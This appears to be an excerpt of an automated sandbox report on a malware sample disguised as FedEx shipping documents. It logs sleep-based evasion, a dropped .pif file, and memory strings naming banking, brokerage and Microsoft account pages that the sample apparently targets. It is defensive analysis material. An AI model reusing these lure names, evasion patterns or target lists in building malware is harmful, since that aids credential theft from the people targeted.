        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -596134s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -595995s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -595865s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -595713s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -595576s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -595368s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -594569s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -594312s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -594155s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -594000s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -593842s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -593708s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -593582s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -593460s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -593351s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -593241s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -593132s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -593023s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -592913s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -592804s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -592695s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -592585s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -592476s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -592366s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -592257s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -592148s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -592014s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -591896s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -591763s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -591617s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -591483s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -591381s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -591257s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -591147s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -591037s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep count: 39 > 30
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -35971150943733603s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -600000s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 768Thread sleep count: 5005 > 30
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -599875s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 768Thread sleep count: 4830 > 30
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -599765s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -599656s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -599547s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -599435s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -599271s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -599155s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -599037s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -598922s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -598797s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -598687s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -598578s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -598469s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -598344s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -598234s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -598125s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -598016s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -597906s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -597797s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -597687s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -597578s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -597469s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -597359s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -597249s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -597140s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -597031s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -596911s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -596774s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -596440s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -596294s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -596162s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -596033s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -595913s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -595812s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -595703s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -595593s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -595480s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -595375s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -595266s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -595156s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -595047s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -594937s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -594827s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -594719s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -594594s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -594484s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -594375s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -594265s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052Thread sleep time: -594154s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D5534C GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02D5534C
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599880Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599764Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599655Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599546Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599281Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599168Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599046Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598937Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598828Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598719Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598609Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598500Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598390Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598281Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598172Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598058Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597953Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597844Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597720Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597594Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597484Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597374Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597265Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597156Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597047Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596937Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596828Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596719Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596592Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596479Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596365Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596248Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596123Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596015Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595906Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595797Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595687Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595577Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595469Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595359Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595250Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595141Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595031Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594922Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594812Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594703Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594593Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594484Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594370Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594266Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 922337203685477
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 600000
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599874
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599764
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599655
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599547
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599436
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599327
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599217
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599109
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599000
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598888
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598781
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598671
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598535
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598406
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598295
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598175
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597641
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597468
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597360
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597249
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597137
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596954
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596848
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596720
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596595
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596468
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596334
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596134
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595995
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595865
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595713
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595576
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595368
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594569
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594312
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594155
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594000
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 593842
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 593708
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 593582
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 593460
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 593351
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 593241
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 593132
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 593023
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 592913
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 592804
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 592695
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 592585
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 592476
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 592366
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 592257
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 592148
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 592014
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 591896
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 591763
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 591617
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 591483
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 591381
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 591257
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 591147
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 591037
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 922337203685477
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 600000
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599875
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599765
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599656
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599547
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599435
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599271
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599155
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599037
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598922
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598797
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598687
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598578
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598469
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598344
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598234
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598125
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598016
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597906
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597797
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597687
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597578
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597469
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597359
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597249
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597140
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597031
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596911
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596774
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596440
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596294
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596162
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596033
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595913
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595812
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595703
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595593
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595480
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595375
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595266
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595156
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595047
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594937
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594827
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594719
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594594
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594484
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594375
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594265
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594154
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
        Source: hzwdvhxM.pif, 0000000E.00000002.3928553785.0000000028AFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltes>
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
        Source: hzwdvhxM.pif, 0000000C.00000002.3925790426.0000000023E81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
